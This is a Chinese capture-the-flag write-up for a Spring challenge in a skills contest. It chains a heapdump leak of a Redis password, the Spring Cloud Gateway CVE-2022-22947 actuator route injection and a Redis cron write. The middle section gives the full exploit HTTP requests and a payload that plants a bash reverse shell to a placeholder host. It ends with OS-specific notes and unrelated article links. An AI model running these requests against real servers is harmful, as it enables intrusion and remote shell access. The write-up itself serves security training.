2024年广西职工职业技能大赛-Spring

考点:

复制代码
1、spring 敏感文件泄露
2、Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)
3、redis反弹shell

解题:

首先是heapdump泄露,读redis key得到

然后利用 Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947) 打redis就可以了

复制代码
POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/json

{
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/new_route/**"
      }
    }
  ],
  "filters": [
    {
      "name": "RewritePath",
      "args": {
        "_genkey_0": "/new_route(?<path>.*)",
        "_genkey_1": "/${path}"
      }
    }
  ],
  "uri": "http://127.0.0.1:6379/",
  "order": 0
}

POST /actuator/gateway/refresh HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/json

{
  "predicate": "Paths: [/new_route], match trailing slash: true",
  "route_id": "new_route",
  "filters": [
    "[[RewritePath /new_route(?<path>.*) = /${path}], order = 1]"
  ],
  "uri": "https://www.cnpanda.net",
  "order": 0
}

POST /new_route/xxx.xxx HTTP/1.1
Host: 3b5744e1e70597c3.node.nsctf.cn
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

auth P@ssw0rd
set xx "\n* * * * * bash -i >& /dev/tcp/vps/port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

注意任务计划反弹shell方法仅适用于Centos

Ubuntu 不能用的原因如下:

因为默认 redis 写文件后是 644 权限,但是 Ubuntu 要求执行定时任务文件 /var/spool/cron/crontabs/<username> 权限必须是 600 才会执行,否则会报错 (root) INSECURE MODE (mode 0600 expected),而 Centos 的定时任务文件 /var/spool/cron/<username> 权限 644 也可以执行

因为 redis 保存 RDB 会存在乱码,在 Ubuntu 上会报错,而在 Centos 上不会报错

由于系统的不同,crontrab 定时文件位置也不同:

复制代码
Centos 的定时任务文件在 /var/spool/cron/<username>
Ubuntu 的定时任务文件在 /var/spool/cron/crontabs/<username>
相关推荐
爱吃烤鸡翅的酸菜鱼11 分钟前
IDEA高效开发:Database Navigator插件安装与核心使用指南
java·开发语言·数据库·编辑器·intellij-idea·database
惊涛骇浪、16 分钟前
SpringMVC + Tomcat10
java·tomcat·springmvc
墨染点香29 分钟前
LeetCode Hot100【6. Z 字形变换】
java·算法·leetcode
枷锁—sha39 分钟前
【DVWA系列】——CSRF——Medium详细教程
android·服务器·前端·web安全·网络安全·csrf
枷锁—sha40 分钟前
跨站请求伪造漏洞(CSRF)详解
运维·服务器·前端·web安全·网络安全·csrf
ldj20201 小时前
SpringBoot为什么使用new RuntimeException() 来获取调用栈?
java·spring boot·后端
超龄超能程序猿1 小时前
Spring 应用中 Swagger 2.0 迁移 OpenAPI 3.0 详解:配置、注解与实践
java·spring boot·后端·spring·spring cloud
风象南1 小时前
SpringBoot配置属性热更新的轻量级实现
java·spring boot·后端
洛阳泰山1 小时前
Spring Boot 整合 Nacos 实战教程:服务注册发现与配置中心详解
java·spring boot·后端·nacos
Y4090011 小时前
C语言转Java语言,相同与相异之处
java·c语言·开发语言·笔记